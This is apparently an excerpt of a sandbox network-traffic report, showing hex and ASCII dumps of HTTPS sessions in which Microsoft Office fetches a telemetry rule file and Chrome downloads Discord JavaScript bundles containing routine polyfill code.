                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC1369INData Raw: 72 44 61 74 61 3a 21 30 2c 73 75 62 74 72 65 65 3a 21 30 7d 29 29 3a 28 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 53 75 62 74 72 65 65 4d 6f 64 69 66 69 65 64 22 2c 74 68 69 73 2e 72 65 66 72 65 73 68 29 2c 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 45 76 65 6e 74 73 41 64 64 65 64 5f 3d 21 30 29 2c 74 68 69 73 2e 63 6f 6e 6e 65 63 74 65 64 5f 3d 21 30 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 64 69 73 63 6f 6e 6e 65 63 74 5f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 21 69 26 26 21 21 74 68 69 73 2e 63 6f 6e 6e 65 63 74 65 64 5f 29 64 6f 63 75 6d 65 6e 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 2c 74 68 69 73 2e 6f 6e 54 72 61 6e 73 69 74
                                                                                                                                                                                                                                                                                    Data Ascii: rData:!0,subtree:!0})):(document.addEventListener("DOMSubtreeModified",this.refresh),this.mutationEventsAdded_=!0),this.connected_=!0},t.prototype.disconnect_=function(){if(!!i&&!!this.connected_)document.removeEventListener("transitionend",this.onTransit
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC1369INData Raw: 6c 65 6d 65 6e 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 42 42 6f 78 7d 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 74 2c 65 2c 6e 2c 72 29 7b 72 65 74 75 72 6e 7b 78 3a 74 2c 79 3a 65 2c 77 69 64 74 68 3a 6e 2c 68 65 69 67 68 74 3a 72 7d 7d 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 74 68 69 73 2e 62 72 6f 61 64 63 61 73 74 57 69 64 74 68 3d 30 2c 74 68 69 73 2e 62 72 6f 61 64 63 61 73 74 48 65 69 67 68 74 3d 30 2c 74 68 69 73 2e 63 6f 6e 74 65 6e 74 52 65 63 74 5f 3d 6c 28 30 2c 30 2c 30 2c 30 29 2c 74 68 69 73 2e 74 61 72 67 65 74 3d 74 7d 72 65 74 75 72 6e 20 74 2e 70 72 6f 74 6f 74 79 70 65 2e 69 73 41 63 74 69 76 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d
                                                                                                                                                                                                                                                                                    Data Ascii: lement&&"function"==typeof t.getBBox};function l(t,e,n,r){return{x:t,y:e,width:n,height:r}}var b=function(){function t(t){this.broadcastWidth=0,this.broadcastHeight=0,this.contentRect_=l(0,0,0,0),this.target=t}return t.prototype.isActive=function(){var t=
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC1369INData Raw: 6f 2c 68 65 69 67 68 74 3a 73 2c 74 6f 70 3a 69 2c 72 69 67 68 74 3a 72 2b 6f 2c 62 6f 74 74 6f 6d 3a 73 2b 69 2c 6c 65 66 74 3a 72 7d 29 2c 63 29 3b 75 28 74 68 69 73 2c 7b 74 61 72 67 65 74 3a 74 2c 63 6f 6e 74 65 6e 74 52 65 63 74 3a 61 7d 29 7d 2c 79 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 2c 65 2c 6e 29 7b 69 66 28 74 68 69 73 2e 61 63 74 69 76 65 4f 62 73 65 72 76 61 74 69 6f 6e 73 5f 3d 5b 5d 2c 74 68 69 73 2e 6f 62 73 65 72 76 61 74 69 6f 6e 73 5f 3d 6e 65 77 20 72 2c 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 74 29 74 68 72 6f 77 20 54 79 70 65 45 72 72 6f 72 28 22 54 68 65 20 63 61 6c 6c 62 61 63 6b 20 70 72 6f 76 69 64 65 64 20 61 73 20 70 61 72 61 6d 65 74 65 72 20 31 20 69 73 20 6e 6f 74 20 61 20
                                                                                                                                                                                                                                                                                    Data Ascii: o,height:s,top:i,right:r+o,bottom:s+i,left:r}),c);u(this,{target:t,contentRect:a})},y=function(){function t(t,e,n){if(this.activeObservations_=[],this.observations_=new r,"function"!=typeof t)throw TypeError("The callback provided as parameter 1 is not a
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC883INData Raw: 79 70 65 2e 62 72 6f 61 64 63 61 73 74 41 63 74 69 76 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 21 74 68 69 73 2e 68 61 73 41 63 74 69 76 65 28 29 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 63 61 6c 6c 62 61 63 6b 43 74 78 5f 2c 65 3d 74 68 69 73 2e 61 63 74 69 76 65 4f 62 73 65 72 76 61 74 69 6f 6e 73 5f 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 6d 28 74 2e 74 61 72 67 65 74 2c 74 2e 62 72 6f 61 64 63 61 73 74 52 65 63 74 28 29 29 7d 29 3b 74 68 69 73 2e 63 61 6c 6c 62 61 63 6b 5f 2e 63 61 6c 6c 28 74 2c 65 2c 74 29 2c 74 68 69 73 2e 63 6c 65 61 72 41 63 74 69 76 65 28 29 7d 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 41 63 74 69 76 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 61 63 74
                                                                                                                                                                                                                                                                                    Data Ascii: ype.broadcastActive=function(){if(!!this.hasActive()){var t=this.callbackCtx_,e=this.activeObservations_.map(function(t){return new m(t.target,t.broadcastRect())});this.callback_.call(t,e,t),this.clearActive()}},t.prototype.clearActive=function(){this.act


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    79192.168.2.54979513.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:44 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 425
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 9aadc8db-201e-000c-3931-3c79c4000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201244Z-178bfbc474bnwsh4hC1NYC2ubs0000000510000000009a9n
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    80192.168.2.549801162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC673OUTGET /assets/a6f6204cd40c3c5f5c14.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC967INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:44 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 21811
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0dbef9472ab-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "0fbb77d1b69f18df0fdcf836de1c4106"
                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 28 Jun 2024 00:43:11 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d9iAamuyaEw0wnIdkxMep9DDfGC3u2VHNuFbe2a7roGWOszlPvseGVbuIZaAr03XhNTM1kqhaNHXzpP61ImNo8y9WcEM%2FiZ33yy8s6ALpFg05mUrz07nr43ZRN4%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 37 31 39 38 34 22 5d 2c 7b 37 37 32 34 32 35 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 76 61 72 20 65 3d 6e 28 39 33 33 36 37 36 29 2c 6f 3d 6e 28 39 33 38 35 30 37 29 2c 69 3d 54 79 70 65 45 72 72 6f 72 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 65 28 74 29 29 72 65 74 75 72 6e 20 74 3b 74 68 72 6f 77 20 69 28 6f 28 74 29 2b 22 20 69 73 20 6e 6f 74 20 61 20 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 7d 7d 2c 36 30 33 35 32 38 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72
                                                                                                                                                                                                                                                                                    Data Ascii: "use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["71984"],{772425:function(t,r,n){var e=n(933676),o=n(938507),i=TypeError;t.exports=function(t){if(e(t))return t;throw i(o(t)+" is not a constructor")}},603528:function(t,r
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC1369INData Raw: 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 29 26 26 28 46 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 4c 28 22 49 6e 63 6f 72 72 65 63 74 20 69 6e 76 6f 63 61 74 69 6f 6e 22 29 7d 2c 50 29 29 66 6f 72 28 65 20 69 6e 20 4e 29 61 5b 65 5d 26 26 77 28 61 5b 65 5d 2c 46 29 3b 69 66 28 28 21 50 7c 7c 21 55 7c 7c 55 3d 3d 3d 5f 29 26 26 28 55 3d 46 2e 70 72 6f 74 6f 74 79 70 65 2c 50 29 29 66 6f 72 28 65 20 69 6e 20 4e 29 61 5b 65 5d 26 26 77 28 61 5b 65 5d 2e 70 72 6f 74 6f 74 79 70 65 2c 55 29 3b 69 66 28 50 26 26 41 28 4d 29 21 3d 3d 55 26 26 77 28 4d 2c 55 29 2c 66 26 26 21 79 28 55 2c 42 29 29 66 6f 72 28 65 20 69 6e 20 56 3d 21 30 2c 67 28 55 2c 42 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                                                    Data Ascii: Function.prototype)&&(F=function(){throw L("Incorrect invocation")},P))for(e in N)a[e]&&w(a[e],F);if((!P||!U||U===_)&&(U=F.prototype,P))for(e in N)a[e]&&w(a[e].prototype,U);if(P&&A(M)!==U&&w(M,U),f&&!y(U,B))for(e in V=!0,g(U,B,{configurable:!0,get:functio
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC1369INData Raw: 29 2c 6c 3d 6e 28 31 34 34 37 34 38 29 2c 41 3d 6e 28 32 37 36 33 32 31 29 2c 77 3d 6e 28 35 33 37 34 34 33 29 2e 66 2c 78 3d 6e 28 36 39 32 39 39 34 29 2c 62 3d 6e 28 31 37 35 34 34 30 29 2c 54 3d 6e 28 38 36 35 33 31 32 29 2c 45 3d 6e 28 36 34 34 36 35 39 29 2c 49 3d 66 2e 50 52 4f 50 45 52 2c 52 3d 66 2e 43 4f 4e 46 49 47 55 52 41 42 4c 45 2c 6d 3d 22 41 72 72 61 79 42 75 66 66 65 72 22 2c 4f 3d 22 44 61 74 61 56 69 65 77 22 2c 4d 3d 22 70 72 6f 74 6f 74 79 70 65 22 2c 46 3d 22 57 72 6f 6e 67 20 69 6e 64 65 78 22 2c 55 3d 45 2e 67 65 74 74 65 72 46 6f 72 28 6d 29 2c 5f 3d 45 2e 67 65 74 74 65 72 46 6f 72 28 4f 29 2c 4c 3d 45 2e 73 65 74 2c 42 3d 65 5b 6d 5d 2c 43 3d 42 2c 53 3d 43 26 26 43 5b 4d 5d 2c 50 3d 65 5b 4f 5d 2c 56 3d 50 26 26 50 5b 4d 5d 2c
                                                                                                                                                                                                                                                                                    Data Ascii: ),l=n(144748),A=n(276321),w=n(537443).f,x=n(692994),b=n(175440),T=n(865312),E=n(644659),I=f.PROPER,R=f.CONFIGURABLE,m="ArrayBuffer",O="DataView",M="prototype",F="Wrong index",U=E.getterFor(m),_=E.getterFor(O),L=E.set,B=e[m],C=B,S=C&&C[M],P=e[O],V=P&&P[M],
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC1369INData Raw: 34 38 33 36 34 39 29 2c 28 74 6f 2e 67 65 74 49 6e 74 38 28 30 29 7c 7c 21 74 6f 2e 67 65 74 49 6e 74 38 28 31 29 29 26 26 73 28 56 2c 7b 73 65 74 49 6e 74 38 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 74 69 28 74 68 69 73 2c 74 2c 72 3c 3c 32 34 3e 3e 32 34 29 7d 2c 73 65 74 55 69 6e 74 38 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 74 69 28 74 68 69 73 2c 74 2c 72 3c 3c 32 34 3e 3e 32 34 29 7d 7d 2c 7b 75 6e 73 61 66 65 3a 21 30 7d 29 7d 65 6c 73 65 20 53 3d 28 43 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 70 28 74 68 69 73 2c 53 29 3b 76 61 72 20 72 3d 64 28 74 29 3b 4c 28 74 68 69 73 2c 7b 74 79 70 65 3a 6d 2c 62 79 74 65 73 3a 59 28 57 28 72 29 2c 30 29 2c 62 79 74 65 4c 65 6e 67 74 68 3a 72 7d 29 2c 21 69 26 26 28 74 68 69 73 2e 62 79 74 65 4c 65 6e
                                                                                                                                                                                                                                                                                    Data Ascii: 483649),(to.getInt8(0)||!to.getInt8(1))&&s(V,{setInt8:function(t,r){ti(this,t,r<<24>>24)},setUint8:function(t,r){ti(this,t,r<<24>>24)}},{unsafe:!0})}else S=(C=function(t){p(this,S);var r=d(t);L(this,{type:m,bytes:Y(W(r),0),byteLength:r}),!i&&(this.byteLen
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC1369INData Raw: 28 74 2c 72 29 7b 24 28 74 68 69 73 2c 32 2c 74 2c 4b 2c 72 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 29 7d 2c 73 65 74 55 69 6e 74 31 36 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 24 28 74 68 69 73 2c 32 2c 74 2c 4b 2c 72 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 29 7d 2c 73 65 74 49 6e 74 33 32 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 24 28 74 68 69 73 2c 34 2c 74 2c 71 2c 72 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 29 7d 2c 73 65 74 55 69 6e 74 33 32 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 24 28 74 68 69 73 2c 34 2c 74 2c 71 2c 72 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e
                                                                                                                                                                                                                                                                                    Data Ascii: (t,r){$(this,2,t,K,r,arguments.length>2&&arguments[2])},setUint16:function(t,r){$(this,2,t,K,r,arguments.length>2&&arguments[2])},setInt32:function(t,r){$(this,4,t,q,r,arguments.length>2&&arguments[2])},setUint32:function(t,r){$(this,4,t,q,r,arguments.len
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:45 UTC1369INData Raw: 65 28 64 2c 67 29 2c 45 3d 66 28 62 29 2c 49 3d 30 2c 52 3d 6c 7c 7c 61 2c 6d 3d 72 3f 52 28 76 2c 45 29 3a 6e 7c 7c 70 3f 52 28 76 2c 30 29 3a 76 6f 69 64 20 30 3b 45 3e 49 3b 49 2b 2b 29 69 66 28 28 68 7c 7c 49 20 69 6e 20 62 29 26 26 28 77 3d 54 28 41 3d 62 5b 49 5d 2c 49 2c 78 29 2c 74 29 29 7b 69 66 28 72 29 6d 5b 49 5d 3d 77 3b 65 6c 73 65 20 69 66 28 77 29 73 77 69 74 63 68 28 74 29 7b 63 61 73 65 20 33 3a 72 65 74 75 72 6e 21 30 3b 63 61 73 65 20 35 3a 72 65 74 75 72 6e 20 41 3b 63 61 73 65 20 36 3a 72 65 74 75 72 6e 20 49 3b 63 61 73 65 20 32 3a 63 28 6d 2c 41 29 7d 65 6c 73 65 20 73 77 69 74 63 68 28 74 29 7b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 21 31 3b 63 61 73 65 20 37 3a 63 28 6d 2c 41 29 7d 7d 72 65 74 75 72 6e 20 79 3f 2d 31 3a 6f 7c 7c
                                                                                                                                                                                                                                                                                    Data Ascii: e(d,g),E=f(b),I=0,R=l||a,m=r?R(v,E):n||p?R(v,0):void 0;E>I;I++)if((h||I in b)&&(w=T(A=b[I],I,x),t)){if(r)m[I]=w;else if(w)switch(t){case 3:return!0;case 5:return A;case 6:return I;case 2:c(m,A)}else switch(t){case 4:return!1;case 7:c(m,A)}}return y?-1:o||
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:45 UTC1369INData Raw: 3c 6f 3f 72 5b 75 2b 2b 5d 3a 6e 5b 66 2b 2b 5d 3b 72 65 74 75 72 6e 20 74 7d 3b 74 2e 65 78 70 6f 72 74 73 3d 69 7d 2c 33 30 38 30 32 30 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 76 61 72 20 65 3d 6e 28 34 39 38 35 37 36 29 2c 6f 3d 6e 28 39 33 33 36 37 36 29 2c 69 3d 6e 28 36 32 32 32 38 31 29 2c 75 3d 6e 28 36 34 31 32 33 36 29 28 22 73 70 65 63 69 65 73 22 29 2c 66 3d 41 72 72 61 79 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 72 3b 72 65 74 75 72 6e 20 65 28 74 29 26 26 28 6f 28 72 3d 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 28 72 3d 3d 3d 66 7c 7c 65 28 72 2e 70 72 6f 74 6f 74 79 70 65 29 29 3f 72 3d 76 6f 69 64 20 30 3a 69 28 72 29 26 26 6e 75 6c 6c 3d 3d 3d 28 72 3d 72 5b 75 5d 29 26 26 28 72 3d
                                                                                                                                                                                                                                                                                    Data Ascii: <o?r[u++]:n[f++];return t};t.exports=i},308020:function(t,r,n){var e=n(498576),o=n(933676),i=n(622281),u=n(641236)("species"),f=Array;t.exports=function(t){var r;return e(t)&&(o(r=t.constructor)&&(r===f||e(r.prototype))?r=void 0:i(r)&&null===(r=r[u])&&(r=
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:45 UTC1369INData Raw: 22 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 63 28 72 3d 66 28 74 29 2c 75 29 29 3f 6e 3a 61 3f 69 28 72 29 3a 22 4f 62 6a 65 63 74 22 3d 3d 3d 28 65 3d 69 28 72 29 29 26 26 6f 28 72 2e 63 61 6c 6c 65 65 29 3f 22 41 72 67 75 6d 65 6e 74 73 22 3a 65 7d 7d 2c 31 38 32 38 36 37 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 76 61 72 20 65 3d 6e 28 39 36 36 36 30 36 29 2c 6f 3d 6e 28 39 37 31 33 31 29 2c 69 3d 6e 28 38 37 39 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 76 61 72 20 75 3d 65 28 72 29 3b 75 20 69 6e 20 74 3f 6f 2e 66 28 74 2c 75 2c 69 28 30 2c 6e 29 29 3a 74 5b 75 5d 3d 6e 7d 7d 2c 39 30 33 33 38 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 76 61 72 20 65 3d 6e 28 38 35 39 32 30
                                                                                                                                                                                                                                                                                    Data Ascii: ":"string"==typeof(n=c(r=f(t),u))?n:a?i(r):"Object"===(e=i(r))&&o(r.callee)?"Arguments":e}},182867:function(t,r,n){var e=n(966606),o=n(97131),i=n(879);t.exports=function(t,r,n){var u=e(r);u in t?o.f(t,u,i(0,n)):t[u]=n}},90338:function(t,r,n){var e=n(85920
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:45 UTC1369INData Raw: 40 40 69 74 65 72 61 74 6f 72 22 29 7c 7c 75 5b 65 28 74 29 5d 7d 7d 2c 39 38 31 39 37 31 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 76 61 72 20 65 3d 6e 28 39 32 36 35 31 35 29 2c 6f 3d 6e 28 35 32 36 39 38 38 29 2c 69 3d 6e 28 32 34 30 33 33 29 2c 75 3d 6e 28 39 33 38 35 30 37 29 2c 66 3d 6e 28 31 31 36 39 37 29 2c 61 3d 54 79 70 65 45 72 72 6f 72 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 76 61 72 20 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3c 32 3f 66 28 74 29 3a 72 3b 69 66 28 6f 28 6e 29 29 72 65 74 75 72 6e 20 69 28 65 28 6e 2c 74 29 29 3b 74 68 72 6f 77 20 61 28 75 28 74 29 2b 22 20 69 73 20 6e 6f 74 20 69 74 65 72 61 62 6c 65 22 29 7d 7d 2c 33 33 39 33 39 39 3a 66 75 6e 63 74 69 6f 6e 28 74 2c
                                                                                                                                                                                                                                                                                    Data Ascii: @@iterator")||u[e(t)]}},981971:function(t,r,n){var e=n(926515),o=n(526988),i=n(24033),u=n(938507),f=n(11697),a=TypeError;t.exports=function(t,r){var n=arguments.length<2?f(t):r;if(o(n))return i(e(n,t));throw a(u(t)+" is not iterable")}},339399:function(t,
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:45 UTC1369INData Raw: 33 36 29 2c 6f 3d 6e 28 38 37 34 36 35 32 29 2c 69 3d 65 28 22 69 74 65 72 61 74 6f 72 22 29 2c 75 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 74 26 26 28 6f 2e 41 72 72 61 79 3d 3d 3d 74 7c 7c 75 5b 69 5d 3d 3d 3d 74 29 7d 7d 2c 34 39 38 35 37 36 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 76 61 72 20 65 3d 6e 28 33 33 32 39 31 36 29 3b 74 2e 65 78 70 6f 72 74 73 3d 41 72 72 61 79 2e 69 73 41 72 72 61 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 41 72 72 61 79 22 3d 3d 3d 65 28 74 29 7d 7d 2c 35 33 36 35 32 34 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 76 61 72 20 65 3d 6e 28 39 37 34 39 37 31 29 3b
                                                                                                                                                                                                                                                                                    Data Ascii: 36),o=n(874652),i=e("iterator"),u=Array.prototype;t.exports=function(t){return void 0!==t&&(o.Array===t||u[i]===t)}},498576:function(t,r,n){var e=n(332916);t.exports=Array.isArray||function(t){return"Array"===e(t)}},536524:function(t,r,n){var e=n(974971);


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    81192.168.2.549802162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:44 UTC673OUTGET /assets/1098b8da25f51e58cea4.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
